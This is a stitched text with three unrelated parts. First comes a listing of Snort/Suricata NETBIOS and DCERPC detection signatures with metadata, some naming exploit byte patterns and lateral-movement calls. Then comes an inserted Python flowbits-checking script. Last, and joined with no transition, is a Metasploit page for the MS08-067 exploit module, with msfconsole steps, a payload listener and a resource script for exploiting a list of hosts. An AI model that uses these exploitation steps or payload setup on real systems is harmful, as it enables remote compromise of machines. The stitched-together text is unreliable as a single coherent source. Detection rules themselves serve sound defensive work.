alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|nddeapi|00|"; within:9; distance:51; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102958; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102963

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102963; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102959

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:51; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102959; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102951

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS too many stacked requests"; flow:to_server,established; content:"|FF|SMB"; pcre:"/^\x00.{3}\xFFSMB(\x73|\x74|\x75|\xa2|\x24|\x2d|\x2e|\x2f).{28}(\x73|\x74|\x75|\xa2|\x24|\x2d|\x2e|\x2f)/"; byte_jump:2,39,little; content:!"|FF|"; within:1; distance:-36; classtype:protocol-command-decode; sid:2102951; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS too many stacked requests

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102990

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102990; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102986

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|winreg|00|"; within:8; distance:51; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102986; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102987

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|w|00|i|00|n|00|r|00|e|00|g|00 00 00|"; within:16; distance:51; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102987; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102923

alert tcp $HOME_NET 139 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB repeated logon failure"; flow:from_server,established; content:"|FF|SMB"; depth:4; offset:4; content:"s"; within:1; content:"m|00 00 C0|"; within:4; threshold:type threshold,track by_dst,count 10,seconds 60; classtype:unsuccessful-user; sid:2102923; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB repeated logon failure

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : unsuccessful-user

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102924

alert tcp $HOME_NET 445 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB-DS repeated logon failure"; flow:from_server,established; content:"|FF|SMB"; depth:4; offset:4; content:"s"; within:1; content:"m|00 00 C0|"; within:4; threshold:type threshold,track by_dst,count 10,seconds 60; classtype:unsuccessful-user; sid:2102924; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS repeated logon failure

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : unsuccessful-user

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2101239

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS RFParalyze Attempt"; flow:to_server,established; content:"BEAVIS"; content:"yep yep"; reference:bugtraq,1163; reference:cve,2000-0347; reference:nessus,10392; classtype:attempted-recon; sid:2101239; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : RFParalyze Attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : bugtraq,1163|cve,2000-0347|nessus,10392

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102950

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB too many stacked requests"; flow:to_server,established; content:"|FF|SMB"; pcre:"/^\x00.{3}\xFFSMB(\x73|\x74|\x75|\xa2|\x24|\x2d|\x2e|\x2f).{28}(\x73|\x74|\x75|\xa2|\x24|\x2d|\x2e|\x2f)/"; byte_jump:2,39,little; content:!"|FF|"; within:1; distance:-36; classtype:protocol-command-decode; sid:2102950; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB too many stacked requests

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103043

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103043; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103000

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup NTMLSSP unicode asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_test:4,&,2147483648,48,relative,little; content:!"NTLMSSP"; within:7; distance:54; asn1:double_overflow, bitstring_overflow, relative_offset 54, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103000; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup NTMLSSP unicode asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2025090

#alert tcp any any -> any [139,445] (msg:"ET NETBIOS Tree Connect AndX Request IPC$ Unicode"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; content:"| 00 5c 00 69 00 70 00 63 00 24 00 00 00|"; nocase; flowbits:set,smb.tree.connect.ipc; flowbits:noalert; metadata: former_category NETBIOS; reference:cve,2006-4691; classtype:protocol-command-decode; sid:2025090; rev:1; metadata:created_at 2016_06_14, updated_at 2017_11_29;)

Name : Tree Connect AndX Request IPC$ Unicode

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2006-4691

CVE reference : Not defined

Creation date : 2016-06-14

Last modified date : 2017-11-29

Rev version : 1

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2025790

alert tcp $HOME_NET [445,139] -> any any (msg:"ET NETBIOS PolarisOffice Insecure Library Loading - SMB ASCII"; flow:from_server; content:"SMB"; offset:4; depth:5; byte_test:1,!&,0x80,7,relative; content:"puiframeworkproresenu|2E|dll"; nocase; distance:0; fast_pattern; reference:url, exploit-db.com/exploits/44985/; metadata: former_category NETBIOS; reference:cve,2018-12589; classtype:attempted-user; sid:2025790; rev:1; metadata:attack_target Client_Endpoint, deployment Perimeter, created_at 2018_07_06, updated_at 2018_07_18;)

Name : PolarisOffice Insecure Library Loading - SMB ASCII

Attack target : Client_Endpoint

Description : This signature will detect an attempt to exploit an Insecure Library Loading vulnerability in PolarisOffice

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : cve,2018-12589

CVE reference : Not defined

Creation date : 2018-07-06

Last modified date : 2018-07-18

Rev version : 1

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2025791

alert tcp $HOME_NET [445,139] -> any any (msg:"ET NETBIOS PolarisOffice Insecure Library Loading - SMB Unicode"; flow:from_server; content:"SMB"; offset:4; depth:5; byte_test:1,&,0x80,7,relative; content:"p|00|u|00|i|00|f|00|r|00|a|00|m|00|e|00|w|00|o|00|r|00|k|00|p|00|r|00|o|00|r|00|e|00|s|00|e|00|n|00|u|00 2E 00|d|00|l|00|l|00|"; nocase; distance:0; reference:url, exploit-db.com/exploits/44985/; metadata: former_category NETBIOS; reference:cve,2018-12589; classtype:attempted-user; sid:2025791; rev:1; metadata:attack_target Client_Endpoint, deployment Perimeter, created_at 2018_07_06, updated_at 2018_07_18;)

Name : PolarisOffice Insecure Library Loading - SMB Unicode

Attack target : Client_Endpoint

Description : This signature will detect an attempt to exploit an Insecure Library Loading vulnerability in PolarisOffice

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : cve,2018-12589

CVE reference : Not defined

Creation date : 2018-07-06

Last modified date : 2018-07-18

Rev version : 1

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2025824

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows RRAS SMB Remote Code Execution"; flow:established,to_server; content:"|21 00 00 00 10 27 00 00 a4 86 01 00 41 41 41 41 04 00 00 00 41 41 41 41 a4 86 01 00 ad 0b 2d 06 d0 ba 61 41 41 90 90 90 90 90|"; metadata: former_category NETBIOS; reference:cve,2017-11885; reference:url,exploit-db.com/exploits/44616/; classtype:attempted-user; sid:2025824; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_and_Server, deployment Perimeter, deployment Datacenter, signature_severity Major, created_at 2018_07_11, performance_impact Low, updated_at 2018_07_18;)

Name : Microsoft Windows RRAS SMB Remote Code Execution

Attack target : Client_and_Server

Description : This signature will detect an attempt to exploit a Remote Code Execution in Windows

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : attempted-user

URL reference : cve,2017-11885|url,exploit-db.com/exploits/44616/

CVE reference : Not defined

Creation date : 2018-07-11

Last modified date : 2018-07-18

Rev version : 1

Category : NETBIOS

Severity : Major

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Low

2027167

#alert tcp any any -> $HOME_NET any (msg:"ET NETBIOS DCERPC WMI Remote Process Execution"; flow:to_server,established; dce_iface:00000143-0000-0000-c000-000000000046; metadata: former_category NETBIOS; classtype:bad-unknown; sid:2027167; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Internal, signature_severity Informational, created_at 2019_04_09, updated_at 2019_04_09;)

Name : DCERPC WMI Remote Process Execution

Attack target : Client_Endpoint

Description : Not defined

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : bad-unknown

URL reference : Not defined

CVE reference : Not defined

Creation date : 2019-04-09

Last modified date : 2019-04-09

Rev version : 1

Category : NETBIOS

Severity : Informational

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2027189

alert tcp any any -> $HOME_NET any (msg:"ET NETBIOS DCERPC DCOM ExecuteShellCommand Call - Likely Lateral Movement"; flow:established,to_server; content:"|00|E|00|x|00|e|00|c|00|u|00|t|00|e|00|S|00|h|00|e|00|l|00|l|00|C|00|o|00|m|00|m|00|a|00|n|00|d|00|"; metadata: former_category NETBIOS; reference:url,enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/; reference:url,enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/; reference:url,attack.mitre.org/techniques/T1175/; classtype:bad-unknown; sid:2027189; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Internal, signature_severity Minor, created_at 2019_04_11, updated_at 2019_04_11;)

Name : DCERPC DCOM ExecuteShellCommand Call - Likely Lateral Movement

Attack target : Client_Endpoint

Description : Not defined

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : bad-unknown

URL reference : url,enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/|url,enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/|url,attack.mitre.org/techniques/T1175/

CVE reference : Not defined

Creation date : 2019-04-11

Last modified date : 2019-04-11

Rev version : 1

Category : NETBIOS

Severity : Minor

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2027190

#alert tcp any any -> $HOME_NET any (msg:"ET NETBIOS DCERPC DCOM ShellExecute - Likely Lateral Movement"; flow:established,to_server; content:"|00|S|00|h|00|e|00|l|00|l|00|E|00|x|00|e|00|c|00|u|00|t|00|e|00|"; metadata: former_category NETBIOS; reference:url,enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/; reference:url,enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/; reference:url,attack.mitre.org/techniques/T1175/; classtype:bad-unknown; sid:2027190; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Internal, signature_severity Minor, created_at 2019_04_11, updated_at 2019_04_11;)

Name : DCERPC DCOM ShellExecute - Likely Lateral Movement

Attack target : Client_Endpoint

Description : Not defined

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : bad-unknown

URL reference : url,enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/|url,enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/|url,attack.mitre.org/techniques/T1175/

CVE reference : Not defined

Creation date : 2019-04-11

Last modified date : 2019-04-11

Rev version : 1

Category : NETBIOS

Severity : Minor

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2027237

alert tcp any any -> $HOME_NET 135 (msg:"ET NETBIOS DCERPC SVCCTL - Remote Service Control Manager Access"; flow:established,to_server; content:"|00 00 00 00 00 00 00 00|"; content:"|13 00 0d 81 bb 7a 36 44 98 f1 35 ad 32 98 f0 38 00 10 03|"; distance:0; within:100; metadata: former_category RPC; classtype:attempted-user; sid:2027237; rev:2; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_and_Server, deployment Perimeter, signature_severity Major, created_at 2019_04_22, performance_impact Low, updated_at 2019_04_22;)

Name : DCERPC SVCCTL - Remote Service Control Manager Access

Attack target : Client_and_Server

Description : Alerts on Windows remote service control manager access.

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : attempted-user

URL reference : Not defined

CVE reference : Not defined

Creation date : 2019-04-22

Last modified date : 2019-04-22

Rev version : 2

Category : RPC

Severity : Major

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Low
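The two winreg rules above (sids 2102986 and 2102987) only fire when the smb.tree.connect.ipc flowbit is already set, and the only rule in this section that sets it (sid 2025090) is listed commented out, so this kind of dependency is worth checking mechanically before deploying a rule set. The script below is an added example, not part of this rule set or any vendor tooling: it parses rule lines in the format shown on this page (abbreviated copies of those three rules are embedded as sample input; single-name flowbits only) and reports every isset check that no enabled rule can satisfy.

```python
"""Cross-check flowbits dependencies in a Snort/Suricata rule set (added example).

A rule with flowbits:isset,NAME can only fire if some *enabled* rule sets
NAME earlier in the flow; commenting out the setter silently disables the
checker too. Single-name flowbits only ('|' / '&' operators are not handled).
"""
import re
from dataclasses import dataclass, field

# Abbreviated copies of three rules from the listing above (long content
# matches dropped): two enabled winreg rules that require smb.tree.connect.ipc,
# and the IPC$ tree-connect rule that sets it, shown disabled on the page.
SAMPLE_RULES = [
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg andx '
    'create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; '
    'content:"|5C|winreg|00|"; flowbits:set,smb.tree.create.winreg; '
    'classtype:protocol-command-decode; sid:2102986; rev:4;)',
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode '
    'andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; '
    'flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102987; rev:4;)',
    '#alert tcp any any -> any [139,445] (msg:"ET NETBIOS Tree Connect AndX Request IPC$ Unicode"; '
    'flow:established,to_server; content:"|FF|SMBu"; flowbits:set,smb.tree.connect.ipc; '
    'flowbits:noalert; reference:cve,2006-4691; classtype:protocol-command-decode; sid:2025090; rev:1;)',
]

# Optional leading '#' (disabled rule), action, protocol, header up to the first
# '(', then the option body up to the final ')'.
RULE_RE = re.compile(r'^\s*(#\s*)?(alert|drop|pass|reject|log)\s+\S+\s+.*?\((.*)\)\s*$')


@dataclass
class Rule:
    sid: int
    msg: str
    enabled: bool
    sets: set = field(default_factory=set)    # flowbits this rule sets
    issets: set = field(default_factory=set)  # flowbits this rule requires


def split_options(body):
    """Split the option body on ';' while ignoring ';' inside quoted values."""
    opts, cur, in_quote, prev = [], [], False, ''
    for ch in body:
        if ch == '"' and prev != '\\':
            in_quote = not in_quote
        if ch == ';' and not in_quote:
            opts.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        prev = ch
    tail = ''.join(cur).strip()
    if tail:
        opts.append(tail)
    return opts


def parse_rule(line):
    """Return a Rule for an (optionally '#'-disabled) rule line, else None."""
    m = RULE_RE.match(line)
    if not m:
        return None
    rule = Rule(sid=0, msg='', enabled=m.group(1) is None)
    for opt in split_options(m.group(3)):
        name, _, value = opt.partition(':')
        name, value = name.strip(), value.strip()
        if name == 'sid':
            rule.sid = int(value)
        elif name == 'msg':
            rule.msg = value.strip('"')
        elif name == 'flowbits':
            parts = [p.strip() for p in value.split(',')]
            if len(parts) == 2 and parts[0] == 'set':
                rule.sets.add(parts[1])
            elif len(parts) == 2 and parts[0] == 'isset':
                rule.issets.add(parts[1])
    return rule


def check_flowbits(lines):
    """Map each flowbit required by an enabled rule but set by no enabled rule
    to the sids of the rules that therefore can never fire."""
    rules = [r for r in map(parse_rule, lines) if r is not None]
    live_setters = {b for r in rules if r.enabled for b in r.sets}
    unsatisfied = {}
    for r in rules:
        if not r.enabled:
            continue
        for b in sorted(r.issets):
            if b not in live_setters:
                unsatisfied.setdefault(b, []).append(r.sid)
    return unsatisfied


def disabled_setters(lines):
    """Map each flowbit to the sids of disabled rules that would set it."""
    out = {}
    for r in map(parse_rule, lines):
        if r is not None and not r.enabled:
            for b in sorted(r.sets):
                out.setdefault(b, []).append(r.sid)
    return out


if __name__ == '__main__':
    off = disabled_setters(SAMPLE_RULES)
    for bit, sids in check_flowbits(SAMPLE_RULES).items():
        hint = f' (setter sid(s) {off[bit]} are commented out)' if bit in off else ''
        print(f'flowbit {bit!r} is never set by an enabled rule; dependent sids {sids}{hint}')
```

Run it over a whole .rules file (one rule per line) to find checkers whose setters were disabled during tuning; re-enabling sid 2025090 (or its ASCII counterpart) restores the winreg rules.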

This page contains detailed information about how to use the exploit/windows/smb/ms08_067_netapi Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

  • Module Overview
    • Module Ranking and Traits
    • Basic Usage
  • Required Options
  • Knowledge Base
    • Vulnerable Application
    • Verification Steps
    • Options
    • Scenarios
  • Msfconsole Usage
    • Module Options
    • Advanced Options
    • Exploit Targets
    • Compatible Payloads
    • Evasion Options
  • Error Messages
  • Related Pull Requests
  • References
  • See Also
  • Authors
  • Version

Module Overview


Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption

Module: exploit/windows/smb/ms08_067_netapi

Source code: modules/exploits/windows/smb/ms08_067_netapi.rb

Disclosure date: 2008-10-28

Last modification time: 2021-12-02 16:33:02 +0000

Supported architecture(s):

Supported platform(s): Windows

Target service / protocol: microsoft-ds, netbios-ssn

Target network port(s): 139, 445

List of CVEs: CVE-2008-4250

This module exploits a parsing flaw in the path
canonicalization code of NetAPI32.dll through the Server
Service. This module is capable of bypassing NX on some
operating systems and service packs. The correct target must
be used to prevent the Server Service (along with a dozen
others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on
subsequent attempts. This is just the first version of this
module, full support for NX bypass on 2003, along with other
platforms, is still in development.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


Using ms08_067_netapi against a single host

Normally, you can use exploit/windows/smb/ms08_067_netapi this way:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
    ... a list of targets ...
msf exploit(ms08_067_netapi) > set TARGET target-id
msf exploit(ms08_067_netapi) > show options
    ... show and set options ...
msf exploit(ms08_067_netapi) > exploit

Using ms08_067_netapi against multiple hosts

Since this is a remote exploit module, you can also run it against multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your
ms08_067_netapi will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and
payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.foreach(ip_list) do |ip|
  # Drop the trailing newline and skip blank lines so RHOST is set cleanly
  ip = ip.strip
  next if ip.empty?

  print_status("Trying against #{ip}")
  run_single("use exploit/windows/smb/ms08_067_netapi")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following
MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
